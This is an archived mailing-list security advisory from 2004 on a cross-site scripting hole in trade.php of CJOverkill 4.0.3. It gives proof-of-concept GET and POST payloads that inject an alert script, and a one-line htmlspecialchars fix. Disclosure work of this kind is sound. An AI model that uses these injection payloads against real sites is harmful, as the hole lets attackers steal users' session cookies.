lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: acidbits at gmail.com (aCiDBiTS)
Subject: CJOverkill 4.0.3 XSS Proof of Concept

+--------------------------------------------------------+
| CJOverkill 4.0.3 Cross Site Scripting Proof of Concept |
| By aCiDBiTS        acidbits@...il.com      10-Oct-2004 |
+--------------------------------------------------------+
    
    [                                              ]
	[ Your web application needs a security audit? ]
    [                 Email me !                   ] 
	[                                              ]

------------
Introduction
------------

(http://cjoverkill.icefire.org/) "CJOverkill is a powerful traffic
trading script that keeps its users happy with their site's growing
traffic. Tested on high traffic sites and proven its outstanding
performance, CJOverkill's security measures prevent others from trying
to cheat you. With this script ,you can rest assured your site is in
good hands."


-------------
Vulnerability
-------------

There is no user input sanitation for some parameters in trade.php.
This can be exploited to insert html-script code that will be executed
in the user browser, allowing to a malicious attacker to steal the
user-cookie for that site. Maybe older versions also vulnerable.
Vendor has been warned, an official patch will be released.


----------------
Proof of Concept
----------------

There are two ways to XSS through trade.php:

(1.) GET. Victim should click on a link like: (needs register globals ON)

http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) POST. Victim should click a form's submit button with hidden fields:

<form action="http://URL_to_cjoverkill_script/trade.php"
method="post"><input name="email" type="hidden" value="fake"><input
name="add" type="hidden" value="1"><input name="url" type="hidden"
value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;
"><input name="" type="submit" value="Click me !"></form>


---------
Quick fix
---------

Edit trade.php, line 135:

	echo ("$tms[$i]<br>");

Modify with:

	echo (htmlspecialchars($tms[$i])."<br>");


Powered by blists - more mailing lists